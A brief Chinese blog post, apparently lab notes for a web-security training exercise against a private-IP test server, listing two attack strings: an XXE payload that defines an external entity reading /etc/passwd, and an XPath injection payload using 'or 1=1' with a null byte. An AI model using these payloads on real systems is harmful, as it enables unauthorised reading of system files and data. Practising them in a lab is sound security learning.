close

Ex1:

檢測字串:

http://192.168.83.132/xml/example1.php? xml=<!DOCTYPE blah [<!ELEMENT foo ANY><!ENTITY bar SYSTEM “file:///etc/passwd” >]><foo>%26bar;</foo>

Ex2:

檢測字串:

http://192.168.83.132/xml/example2.php?name=hacker%E2%80%99%20or%201=1]/parent::*/child::node()%00

>%26bar;</foo>

 

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 布拉怡 的頭像
    布拉怡

    nini的部落格

    布拉怡 發表在 痞客邦 留言(0) 人氣()